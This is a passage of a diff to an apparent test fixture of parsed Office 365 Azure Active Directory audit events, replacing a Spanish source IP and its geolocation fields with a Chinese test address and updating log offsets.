-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5061,8 +4997,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -5077,7 +5013,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 162595,
+        "log.offset": 162531,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5106,9 +5042,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5200,20 +5136,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5224,8 +5158,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -5240,7 +5174,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 167745,
+        "log.offset": 167679,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5269,9 +5203,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5364,20 +5298,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5388,8 +5320,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -5404,7 +5336,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 172525,
+        "log.offset": 172457,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5433,9 +5365,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5528,20 +5460,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5569,7 +5499,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "support.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 177305,
+        "log.offset": 177235,
         "o365.audit.Actor": [
             {
                 "ID": "00000000-0000-0000-0000-000000000000",
@@ -5694,8 +5624,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:16:18.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -5710,7 +5640,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 181962,
+        "log.offset": 181892,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5739,9 +5669,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:16:18",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5833,20 +5763,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5857,8 +5785,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:16:18.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -5873,7 +5801,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 187354,
+        "log.offset": 187282,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5902,9 +5830,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:16:18",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5996,20 +5924,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6020,8 +5946,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:16:18.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -6036,7 +5962,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 192746,
+        "log.offset": 192672,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6065,9 +5991,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:16:18",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6159,20 +6085,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6183,8 +6107,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:00.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -6199,7 +6123,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 198138,
+        "log.offset": 198062,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6228,9 +6152,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:00",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6322,20 +6246,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6346,8 +6268,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:00.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -6362,7 +6284,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 203293,
+        "log.offset": 203215,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6391,9 +6313,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:00",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6485,20 +6407,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6509,8 +6429,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:00.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -6525,7 +6445,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 208491,
+        "log.offset": 208411,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6554,9 +6474,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:00",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6648,20 +6568,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6672,8 +6590,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:00.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -6688,7 +6606,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 213646,
+        "log.offset": 213564,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6717,9 +6635,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:00",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6811,20 +6729,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6835,8 +6751,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:00.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -6851,7 +6767,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 218844,
+        "log.offset": 218760,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6880,9 +6796,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:00",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6974,20 +6890,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6998,8 +6912,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7014,7 +6928,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 224042,
+        "log.offset": 223956,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -7043,9 +6957,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7137,20 +7051,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
